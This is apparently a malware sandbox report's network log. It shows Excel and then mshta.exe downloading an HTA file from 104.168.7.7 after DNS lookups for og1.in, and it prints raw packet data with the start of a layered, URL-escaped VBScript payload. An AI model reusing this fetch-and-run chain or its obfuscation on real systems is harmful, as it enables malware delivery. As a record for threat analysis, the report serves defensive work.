                                                              Sep 30, 2024 10:26:31.568892956 CEST4916980192.168.2.22104.168.7.7
                                                              Sep 30, 2024 10:26:31.568905115 CEST4916980192.168.2.22104.168.7.7
                                                              Sep 30, 2024 10:26:31.568923950 CEST4916980192.168.2.22104.168.7.7
                                                              Sep 30, 2024 10:26:31.568941116 CEST8049169104.168.7.7192.168.2.22
                                                              Sep 30, 2024 10:26:31.568953991 CEST8049169104.168.7.7192.168.2.22
                                                              Sep 30, 2024 10:26:31.568965912 CEST8049169104.168.7.7192.168.2.22
                                                              Sep 30, 2024 10:26:31.568983078 CEST4916980192.168.2.22104.168.7.7
                                                              Sep 30, 2024 10:26:31.569000006 CEST4916980192.168.2.22104.168.7.7
                                                              Sep 30, 2024 10:26:31.569040060 CEST8049169104.168.7.7192.168.2.22
                                                              Sep 30, 2024 10:26:31.569051027 CEST8049169104.168.7.7192.168.2.22
                                                              Sep 30, 2024 10:26:31.569056988 CEST8049169104.168.7.7192.168.2.22
                                                              Sep 30, 2024 10:26:31.569067955 CEST8049169104.168.7.7192.168.2.22
                                                              Sep 30, 2024 10:26:31.569087982 CEST8049169104.168.7.7192.168.2.22
                                                              Sep 30, 2024 10:26:31.569094896 CEST4916980192.168.2.22104.168.7.7
                                                              Sep 30, 2024 10:26:31.569102049 CEST8049169104.168.7.7192.168.2.22
                                                              Sep 30, 2024 10:26:31.569118023 CEST4916980192.168.2.22104.168.7.7
                                                              Sep 30, 2024 10:26:31.569123030 CEST8049169104.168.7.7192.168.2.22
                                                              Sep 30, 2024 10:26:31.569135904 CEST4916980192.168.2.22104.168.7.7
                                                              Sep 30, 2024 10:26:31.569137096 CEST8049169104.168.7.7192.168.2.22
                                                              Sep 30, 2024 10:26:31.569164038 CEST4916980192.168.2.22104.168.7.7
                                                              Sep 30, 2024 10:26:31.569168091 CEST8049169104.168.7.7192.168.2.22
                                                              Sep 30, 2024 10:26:31.569180012 CEST8049169104.168.7.7192.168.2.22
                                                              Sep 30, 2024 10:26:31.569185972 CEST4916980192.168.2.22104.168.7.7
                                                              Sep 30, 2024 10:26:31.569191933 CEST8049169104.168.7.7192.168.2.22
                                                              Sep 30, 2024 10:26:31.569192886 CEST4916980192.168.2.22104.168.7.7
                                                              Sep 30, 2024 10:26:31.569216013 CEST4916980192.168.2.22104.168.7.7
                                                              Sep 30, 2024 10:26:31.569232941 CEST4916980192.168.2.22104.168.7.7
                                                              Sep 30, 2024 10:26:31.569236040 CEST8049169104.168.7.7192.168.2.22
                                                              Sep 30, 2024 10:26:31.569247961 CEST8049169104.168.7.7192.168.2.22
                                                              Sep 30, 2024 10:26:31.569259882 CEST8049169104.168.7.7192.168.2.22
                                                              Sep 30, 2024 10:26:31.569271088 CEST8049169104.168.7.7192.168.2.22
                                                              Sep 30, 2024 10:26:31.569278955 CEST4916980192.168.2.22104.168.7.7
                                                              Sep 30, 2024 10:26:31.569298029 CEST4916980192.168.2.22104.168.7.7
                                                              Sep 30, 2024 10:26:31.569302082 CEST8049169104.168.7.7192.168.2.22
                                                              Sep 30, 2024 10:26:31.569314003 CEST8049169104.168.7.7192.168.2.22
                                                              Sep 30, 2024 10:26:31.569314957 CEST4916980192.168.2.22104.168.7.7
                                                              Sep 30, 2024 10:26:31.569328070 CEST8049169104.168.7.7192.168.2.22
                                                              Sep 30, 2024 10:26:31.569338083 CEST4916980192.168.2.22104.168.7.7
                                                              Sep 30, 2024 10:26:31.569339991 CEST8049169104.168.7.7192.168.2.22
                                                              Sep 30, 2024 10:26:31.569353104 CEST8049169104.168.7.7192.168.2.22
                                                              Sep 30, 2024 10:26:31.569355965 CEST4916980192.168.2.22104.168.7.7
                                                              Sep 30, 2024 10:26:31.569365025 CEST8049169104.168.7.7192.168.2.22
                                                              Sep 30, 2024 10:26:31.569377899 CEST4916980192.168.2.22104.168.7.7
                                                              Sep 30, 2024 10:26:31.569391012 CEST4916980192.168.2.22104.168.7.7
                                                              Sep 30, 2024 10:26:31.569403887 CEST4916980192.168.2.22104.168.7.7
                                                              Sep 30, 2024 10:26:31.570564032 CEST8049169104.168.7.7192.168.2.22
                                                              Sep 30, 2024 10:26:31.570585012 CEST8049169104.168.7.7192.168.2.22
                                                              Sep 30, 2024 10:26:31.570597887 CEST8049169104.168.7.7192.168.2.22
                                                              Sep 30, 2024 10:26:31.570625067 CEST8049169104.168.7.7192.168.2.22
                                                              Sep 30, 2024 10:26:31.570626020 CEST4916980192.168.2.22104.168.7.7
                                                              Sep 30, 2024 10:26:31.570638895 CEST4916980192.168.2.22104.168.7.7
                                                              Sep 30, 2024 10:26:31.570647001 CEST8049169104.168.7.7192.168.2.22
                                                              Sep 30, 2024 10:26:31.570660114 CEST8049169104.168.7.7192.168.2.22
                                                              Sep 30, 2024 10:26:31.570662975 CEST4916980192.168.2.22104.168.7.7
                                                              Sep 30, 2024 10:26:31.570672989 CEST8049169104.168.7.7192.168.2.22
                                                              Sep 30, 2024 10:26:31.570687056 CEST4916980192.168.2.22104.168.7.7
                                                              Sep 30, 2024 10:26:31.570691109 CEST8049169104.168.7.7192.168.2.22
                                                              Sep 30, 2024 10:26:31.570705891 CEST4916980192.168.2.22104.168.7.7
                                                              Sep 30, 2024 10:26:31.570725918 CEST4916980192.168.2.22104.168.7.7
                                                              Sep 30, 2024 10:26:31.570768118 CEST8049169104.168.7.7192.168.2.22
                                                              Sep 30, 2024 10:26:31.570802927 CEST4916980192.168.2.22104.168.7.7
                                                              Sep 30, 2024 10:26:31.570808887 CEST8049169104.168.7.7192.168.2.22
                                                              Sep 30, 2024 10:26:31.570827961 CEST8049169104.168.7.7192.168.2.22
                                                              Sep 30, 2024 10:26:31.570847034 CEST4916980192.168.2.22104.168.7.7
                                                              Sep 30, 2024 10:26:31.570848942 CEST8049169104.168.7.7192.168.2.22
                                                              Sep 30, 2024 10:26:31.570868015 CEST8049169104.168.7.7192.168.2.22
                                                              Sep 30, 2024 10:26:31.570873976 CEST4916980192.168.2.22104.168.7.7
                                                              Sep 30, 2024 10:26:31.570882082 CEST8049169104.168.7.7192.168.2.22
                                                              Sep 30, 2024 10:26:31.570893049 CEST4916980192.168.2.22104.168.7.7
                                                              Sep 30, 2024 10:26:31.570894003 CEST8049169104.168.7.7192.168.2.22
                                                              Sep 30, 2024 10:26:31.570911884 CEST4916980192.168.2.22104.168.7.7
                                                              Sep 30, 2024 10:26:31.570931911 CEST4916980192.168.2.22104.168.7.7
                                                              Sep 30, 2024 10:26:31.571095943 CEST8049169104.168.7.7192.168.2.22
                                                              Sep 30, 2024 10:26:31.571108103 CEST8049169104.168.7.7192.168.2.22
                                                              Sep 30, 2024 10:26:31.571120977 CEST8049169104.168.7.7192.168.2.22
                                                              Sep 30, 2024 10:26:31.571127892 CEST4916980192.168.2.22104.168.7.7
                                                              Sep 30, 2024 10:26:31.571141005 CEST8049169104.168.7.7192.168.2.22
                                                              Sep 30, 2024 10:26:31.571150064 CEST4916980192.168.2.22104.168.7.7
                                                              Sep 30, 2024 10:26:31.571154118 CEST8049169104.168.7.7192.168.2.22
                                                              Sep 30, 2024 10:26:31.571166992 CEST8049169104.168.7.7192.168.2.22
                                                              Sep 30, 2024 10:26:31.571177006 CEST4916980192.168.2.22104.168.7.7
                                                              Sep 30, 2024 10:26:31.571196079 CEST4916980192.168.2.22104.168.7.7
                                                              Sep 30, 2024 10:26:31.571206093 CEST4916980192.168.2.22104.168.7.7
                                                              Sep 30, 2024 10:26:31.571249008 CEST8049169104.168.7.7192.168.2.22
                                                              Sep 30, 2024 10:26:31.571269989 CEST8049169104.168.7.7192.168.2.22
                                                              Sep 30, 2024 10:26:31.571290016 CEST4916980192.168.2.22104.168.7.7
                                                              Sep 30, 2024 10:26:31.571290970 CEST8049169104.168.7.7192.168.2.22
                                                              Sep 30, 2024 10:26:31.571301937 CEST8049169104.168.7.7192.168.2.22
                                                              Sep 30, 2024 10:26:31.571306944 CEST4916980192.168.2.22104.168.7.7
                                                              Sep 30, 2024 10:26:31.571320057 CEST4916980192.168.2.22104.168.7.7
                                                              Sep 30, 2024 10:26:31.571321964 CEST8049169104.168.7.7192.168.2.22
                                                              Sep 30, 2024 10:26:31.571333885 CEST8049169104.168.7.7192.168.2.22
                                                              Sep 30, 2024 10:26:31.571340084 CEST4916980192.168.2.22104.168.7.7
                                                              Sep 30, 2024 10:26:31.571346998 CEST8049169104.168.7.7192.168.2.22
                                                              Sep 30, 2024 10:26:31.571357965 CEST4916980192.168.2.22104.168.7.7
                                                              Sep 30, 2024 10:26:31.571366072 CEST8049169104.168.7.7192.168.2.22
                                                              Sep 30, 2024 10:26:31.571376085 CEST4916980192.168.2.22104.168.7.7
                                                              Sep 30, 2024 10:26:31.571381092 CEST8049169104.168.7.7192.168.2.22
                                                              Sep 30, 2024 10:26:31.571398973 CEST4916980192.168.2.22104.168.7.7
                                                              Sep 30, 2024 10:26:31.571398973 CEST4916980192.168.2.22104.168.7.7
                                                              Sep 30, 2024 10:26:31.571398973 CEST8049169104.168.7.7192.168.2.22
                                                              Sep 30, 2024 10:26:31.571420908 CEST4916980192.168.2.22104.168.7.7
                                                              Sep 30, 2024 10:26:31.571434975 CEST4916980192.168.2.22104.168.7.7
                                                              Sep 30, 2024 10:26:31.572058916 CEST8049169104.168.7.7192.168.2.22
                                                              Sep 30, 2024 10:26:31.572078943 CEST8049169104.168.7.7192.168.2.22
                                                              Sep 30, 2024 10:26:31.572092056 CEST8049169104.168.7.7192.168.2.22
                                                              Sep 30, 2024 10:26:31.572107077 CEST4916980192.168.2.22104.168.7.7
                                                              Sep 30, 2024 10:26:31.572120905 CEST4916980192.168.2.22104.168.7.7
                                                              Sep 30, 2024 10:26:31.572130919 CEST8049169104.168.7.7192.168.2.22
                                                              Sep 30, 2024 10:26:31.572143078 CEST8049169104.168.7.7192.168.2.22
                                                              Sep 30, 2024 10:26:31.572154999 CEST8049169104.168.7.7192.168.2.22
                                                              Sep 30, 2024 10:26:31.572166920 CEST4916980192.168.2.22104.168.7.7
                                                              Sep 30, 2024 10:26:31.572169065 CEST8049169104.168.7.7192.168.2.22
                                                              Sep 30, 2024 10:26:31.572181940 CEST8049169104.168.7.7192.168.2.22
                                                              Sep 30, 2024 10:26:31.572184086 CEST4916980192.168.2.22104.168.7.7
                                                              Sep 30, 2024 10:26:31.572195053 CEST4916980192.168.2.22104.168.7.7
                                                              Sep 30, 2024 10:26:31.572195053 CEST8049169104.168.7.7192.168.2.22
                                                              Sep 30, 2024 10:26:31.572215080 CEST8049169104.168.7.7192.168.2.22
                                                              Sep 30, 2024 10:26:31.572216988 CEST4916980192.168.2.22104.168.7.7
                                                              Sep 30, 2024 10:26:31.572227001 CEST8049169104.168.7.7192.168.2.22
                                                              Sep 30, 2024 10:26:31.572228909 CEST4916980192.168.2.22104.168.7.7
                                                              Sep 30, 2024 10:26:31.572259903 CEST8049169104.168.7.7192.168.2.22
                                                              Sep 30, 2024 10:26:31.572267056 CEST4916980192.168.2.22104.168.7.7
                                                              Sep 30, 2024 10:26:31.572273016 CEST8049169104.168.7.7192.168.2.22
                                                              Sep 30, 2024 10:26:31.572294950 CEST4916980192.168.2.22104.168.7.7
                                                              Sep 30, 2024 10:26:31.572314024 CEST4916980192.168.2.22104.168.7.7
                                                              Sep 30, 2024 10:26:31.572346926 CEST4916980192.168.2.22104.168.7.7
                                                              Sep 30, 2024 10:26:31.572372913 CEST8049169104.168.7.7192.168.2.22
                                                              Sep 30, 2024 10:26:31.572386026 CEST8049169104.168.7.7192.168.2.22
                                                              Sep 30, 2024 10:26:31.572421074 CEST4916980192.168.2.22104.168.7.7
                                                              Sep 30, 2024 10:26:31.572968006 CEST8049169104.168.7.7192.168.2.22
                                                              Sep 30, 2024 10:26:31.572979927 CEST8049169104.168.7.7192.168.2.22
                                                              Sep 30, 2024 10:26:31.573014021 CEST4916980192.168.2.22104.168.7.7
                                                              Sep 30, 2024 10:26:31.573077917 CEST8049169104.168.7.7192.168.2.22
                                                              Sep 30, 2024 10:26:31.573116064 CEST4916980192.168.2.22104.168.7.7
                                                              Sep 30, 2024 10:26:31.573172092 CEST8049169104.168.7.7192.168.2.22
                                                              Sep 30, 2024 10:26:31.573184013 CEST8049169104.168.7.7192.168.2.22
                                                              Sep 30, 2024 10:26:31.573221922 CEST4916980192.168.2.22104.168.7.7
                                                              Sep 30, 2024 10:26:31.573231936 CEST4916980192.168.2.22104.168.7.7
                                                              Sep 30, 2024 10:26:31.573296070 CEST8049169104.168.7.7192.168.2.22
                                                              Sep 30, 2024 10:26:31.573308945 CEST8049169104.168.7.7192.168.2.22
                                                              Sep 30, 2024 10:26:31.573323011 CEST8049169104.168.7.7192.168.2.22
                                                              Sep 30, 2024 10:26:31.573328972 CEST4916980192.168.2.22104.168.7.7
                                                              Sep 30, 2024 10:26:31.573334932 CEST8049169104.168.7.7192.168.2.22
                                                              Sep 30, 2024 10:26:31.573348045 CEST8049169104.168.7.7192.168.2.22
                                                              Sep 30, 2024 10:26:31.573359966 CEST8049169104.168.7.7192.168.2.22
                                                              Sep 30, 2024 10:26:31.573364019 CEST4916980192.168.2.22104.168.7.7
                                                              Sep 30, 2024 10:26:31.573374033 CEST8049169104.168.7.7192.168.2.22
                                                              Sep 30, 2024 10:26:31.573379993 CEST4916980192.168.2.22104.168.7.7
                                                              Sep 30, 2024 10:26:31.573385954 CEST8049169104.168.7.7192.168.2.22
                                                              Sep 30, 2024 10:26:31.573393106 CEST4916980192.168.2.22104.168.7.7
                                                              Sep 30, 2024 10:26:31.573400021 CEST8049169104.168.7.7192.168.2.22
                                                              Sep 30, 2024 10:26:31.573411942 CEST8049169104.168.7.7192.168.2.22
                                                              Sep 30, 2024 10:26:31.573411942 CEST4916980192.168.2.22104.168.7.7
                                                              Sep 30, 2024 10:26:31.573426008 CEST8049169104.168.7.7192.168.2.22
                                                              Sep 30, 2024 10:26:31.573427916 CEST4916980192.168.2.22104.168.7.7
                                                              Sep 30, 2024 10:26:31.573445082 CEST4916980192.168.2.22104.168.7.7
                                                              Sep 30, 2024 10:26:31.573477983 CEST4916980192.168.2.22104.168.7.7
                                                              Sep 30, 2024 10:26:31.573518991 CEST4916980192.168.2.22104.168.7.7
                                                              Sep 30, 2024 10:26:31.574678898 CEST8049169104.168.7.7192.168.2.22
                                                              Sep 30, 2024 10:26:31.574697971 CEST8049169104.168.7.7192.168.2.22
                                                              Sep 30, 2024 10:26:31.574712038 CEST8049169104.168.7.7192.168.2.22
                                                              Sep 30, 2024 10:26:31.574723959 CEST8049169104.168.7.7192.168.2.22
                                                              Sep 30, 2024 10:26:31.574731112 CEST4916980192.168.2.22104.168.7.7
                                                              Sep 30, 2024 10:26:31.574738026 CEST8049169104.168.7.7192.168.2.22
                                                              Sep 30, 2024 10:26:31.574750900 CEST8049169104.168.7.7192.168.2.22
                                                              Sep 30, 2024 10:26:31.574758053 CEST4916980192.168.2.22104.168.7.7
                                                              Sep 30, 2024 10:26:31.574764013 CEST8049169104.168.7.7192.168.2.22
                                                              Sep 30, 2024 10:26:31.574776888 CEST4916980192.168.2.22104.168.7.7
                                                              Sep 30, 2024 10:26:31.574776888 CEST8049169104.168.7.7192.168.2.22
                                                              Sep 30, 2024 10:26:31.574790955 CEST8049169104.168.7.7192.168.2.22
                                                              Sep 30, 2024 10:26:31.574795961 CEST4916980192.168.2.22104.168.7.7
                                                              Sep 30, 2024 10:26:31.574805021 CEST8049169104.168.7.7192.168.2.22
                                                              Sep 30, 2024 10:26:31.574810028 CEST4916980192.168.2.22104.168.7.7
                                                              Sep 30, 2024 10:26:31.574819088 CEST8049169104.168.7.7192.168.2.22
                                                              Sep 30, 2024 10:26:31.574826002 CEST4916980192.168.2.22104.168.7.7
                                                              Sep 30, 2024 10:26:31.574832916 CEST8049169104.168.7.7192.168.2.22
                                                              Sep 30, 2024 10:26:31.574841022 CEST4916980192.168.2.22104.168.7.7
                                                              Sep 30, 2024 10:26:31.574841976 CEST8049169104.168.7.7192.168.2.22
                                                              Sep 30, 2024 10:26:31.574958086 CEST4916980192.168.2.22104.168.7.7
                                                              Sep 30, 2024 10:26:35.349818945 CEST8049169104.168.7.7192.168.2.22
                                                              Sep 30, 2024 10:26:35.349888086 CEST4916980192.168.2.22104.168.7.7
                                                              Sep 30, 2024 10:26:37.348721981 CEST4916980192.168.2.22104.168.7.7

                                                              UDP Packets

                                                              TimestampSource PortDest PortSource IPDest IP
                                                              Sep 30, 2024 10:26:15.465696096 CEST5484253192.168.2.228.8.8.8
                                                              Sep 30, 2024 10:26:15.477163076 CEST53548428.8.8.8192.168.2.22
                                                              Sep 30, 2024 10:26:17.832532883 CEST5810553192.168.2.228.8.8.8
                                                              Sep 30, 2024 10:26:17.843753099 CEST53581058.8.8.8192.168.2.22

                                                              DNS Queries

                                                              TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                              Sep 30, 2024 10:26:15.465696096 CEST192.168.2.228.8.8.80x54b7Standard query (0)og1.inA (IP address)IN (0x0001)false
                                                              Sep 30, 2024 10:26:17.832532883 CEST192.168.2.228.8.8.80x13Standard query (0)og1.inA (IP address)IN (0x0001)false

                                                              DNS Answers

                                                              TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                              Sep 30, 2024 10:26:15.477163076 CEST8.8.8.8192.168.2.220x54b7No error (0)og1.in172.67.216.244A (IP address)IN (0x0001)false
                                                              Sep 30, 2024 10:26:15.477163076 CEST8.8.8.8192.168.2.220x54b7No error (0)og1.in104.21.78.54A (IP address)IN (0x0001)false
                                                              Sep 30, 2024 10:26:17.843753099 CEST8.8.8.8192.168.2.220x13No error (0)og1.in104.21.78.54A (IP address)IN (0x0001)false
                                                              Sep 30, 2024 10:26:17.843753099 CEST8.8.8.8192.168.2.220x13No error (0)og1.in172.67.216.244A (IP address)IN (0x0001)false

                                                              HTTP Request Dependency Graph

                                                              • og1.in
                                                              • 104.168.7.7

                                                              HTTP Packets

                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              0192.168.2.2249166104.168.7.7803188C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                              TimestampBytes transferredDirectionData
                                                              Sep 30, 2024 10:26:16.926759958 CEST347OUTGET /356/ce/IEnetbookupdateion.hta HTTP/1.1
                                                              Accept: */*
                                                              UA-CPU: AMD64
                                                              Accept-Encoding: gzip, deflate
                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                                              Host: 104.168.7.7
                                                              Connection: Keep-Alive
                                                              Sep 30, 2024 10:26:17.393667936 CEST1236INHTTP/1.1 200 OK
                                                              Date: Mon, 30 Sep 2024 08:26:17 GMT
                                                              Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.1.25
                                                              Last-Modified: Mon, 30 Sep 2024 01:06:36 GMT
                                                              ETag: "1cecc-6234bd0fe5c83"
                                                              Accept-Ranges: bytes
                                                              Content-Length: 118476
                                                              Keep-Alive: timeout=5, max=100
                                                              Connection: Keep-Alive
                                                              Content-Type: application/hta
                                                              Data Raw: 3c 73 63 72 69 70 74 3e 0d 0a 3c 21 2d 2d 0d 0a 64 6f 63 75 6d 65 6e 74 2e 77 72 69 74 65 28 75 6e 65 73 63 61 70 65 28 22 25 33 43 73 63 72 69 70 74 25 33 45 25 30 41 25 33 43 25 32 31 2d 2d 25 30 41 64 6f 63 75 6d 65 6e 74 2e 77 72 69 74 65 25 32 38 75 6e 65 73 63 61 70 65 25 32 38 25 32 32 25 32 35 33 43 73 63 72 69 70 74 25 32 35 32 30 6c 61 6e 67 75 61 67 65 25 32 35 33 44 4a 61 76 61 53 63 72 69 70 74 25 32 35 33 45 6d 25 32 35 33 44 25 32 35 32 37 25 32 35 32 35 33 43 25 32 35 32 35 32 31 44 4f 43 54 59 50 45 25 32 35 32 35 32 30 68 74 6d 6c 25 32 35 32 35 33 45 25 32 35 32 35 30 41 25 32 35 32 35 33 43 6d 65 74 61 25 32 35 32 35 32 30 68 74 74 70 2d 65 71 75 69 76 25 32 35 32 35 33 44 25 32 35 32 35 32 32 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 25 32 35 32 35 32 32 25 32 35 32 35 32 30 63 6f 6e 74 65 6e 74 25 32 35 32 35 33 44 25 32 35 32 35 32 32 49 45 25 32 35 32 35 33 44 45 6d 75 6c 61 74 65 49 45 38 25 32 35 32 35 32 32 25 32 35 32 35 32 30 25 32 35 32 35 33 45 25 32 35 32 35 30 41 [TRUNCATED]
                                                              Data Ascii: <script>...document.write(unescape("%3Cscript%3E%0A%3C%21--%0Adocument.write%28unescape%28%22%253Cscript%2520language%253DJavaScript%253Em%253D%2527%25253C%252521DOCTYPE%252520html%25253E%25250A%25253Cmeta%252520http-equiv%25253D%252522X-UA-Compatible%252522%252520content%25253D%252522IE%25253DEmulateIE8%252522%252520%25253E%25250A%25253Chtml%25253E%25250A%25253Cbody%25253E%25250A%25253CSCRIpT%252520TyPE%25253D%252522TeXt/vBSCrIpt%252522%25253E%25250ADim%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%2525
                                                              Sep 30, 2024 10:26:17.393690109 CEST1236INData Raw: 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35
                                                              Data Ascii: 09%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%25
                                                              Sep 30, 2024 10:26:17.393707991 CEST448INData Raw: 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39
                                                              Data Ascii: 52509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509
                                                              Sep 30, 2024 10:26:17.393727064 CEST1236INData Raw: 54 52 48 64 74 65 50 65 64 67 4e 71 76 6a 71 46 58 4a 54 64 75 67 75 69 74 41 43 6a 6c 4a 6c 4e 59 6f 6a 53 50 44 66 55 44 54 48 66 45 59 62 6c 51 56 48 70 63 62 64 57 47 6b 6e 46 68 72 5a 70 48 6b 42 41 53 75 49 6b 51 47 51 73 4b 6d 45 42 53 56
                                                              Data Ascii: TRHdtePedgNqvjqFXJTduguitACjlJlNYojSPDfUDTHfEYblQVHpcbdWGknFhrZpHkBASuIkQGQsKmEBSVuPjOyRJHYsrxDKdhdPkEsoZVHQtZVQkjDsvvxiMtclweSkuGlBAigvlmDopnUtboCLxXYkWXVYeoOfOktzwjSVIiZBgfxxAKMJVxVkwS%252509%252509%252509%252509%252509%252509%252509%252509%
                                                              Sep 30, 2024 10:26:17.393742085 CEST1236INData Raw: 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35
                                                              Data Ascii: %252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%2525
                                                              Sep 30, 2024 10:26:17.393755913 CEST1236INData Raw: 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32
                                                              Data Ascii: 509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%2
                                                              Sep 30, 2024 10:26:17.393770933 CEST1236INData Raw: 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30
                                                              Data Ascii: 252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%25250
                                                              Sep 30, 2024 10:26:17.393785000 CEST1236INData Raw: 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32
                                                              Data Ascii: 9%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252
                                                              Sep 30, 2024 10:26:17.393800974 CEST1236INData Raw: 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25
                                                              Data Ascii: 2509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%
                                                              Sep 30, 2024 10:26:17.393814087 CEST776INData Raw: 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35
                                                              Data Ascii: %252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%2525
                                                              Sep 30, 2024 10:26:17.398817062 CEST1236INData Raw: 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32
                                                              Data Ascii: 9%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              1192.168.2.2249168104.168.7.7803496C:\Windows\System32\mshta.exe
                                                              TimestampBytes transferredDirectionData
                                                              Sep 30, 2024 10:26:19.628990889 CEST424OUTGET /356/ce/IEnetbookupdateion.hta HTTP/1.1
                                                              Accept: */*
                                                              Accept-Language: en-US
                                                              UA-CPU: AMD64
                                                              Accept-Encoding: gzip, deflate
                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                                              Range: bytes=8896-
                                                              Connection: Keep-Alive
                                                              Host: 104.168.7.7
                                                              If-Range: "1cecc-6234bd0fe5c83"
                                                              Sep 30, 2024 10:26:20.094104052 CEST1236INHTTP/1.1 206 Partial Content
                                                              Date: Mon, 30 Sep 2024 08:26:19 GMT
                                                              Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.1.25
                                                              Last-Modified: Mon, 30 Sep 2024 01:06:36 GMT
                                                              ETag: "1cecc-6234bd0fe5c83"
                                                              Accept-Ranges: bytes
                                                              Content-Length: 109580
                                                              Content-Range: bytes 8896-118475/118476
                                                              Keep-Alive: timeout=5, max=100
                                                              Connection: Keep-Alive
                                                              Content-Type: application/hta
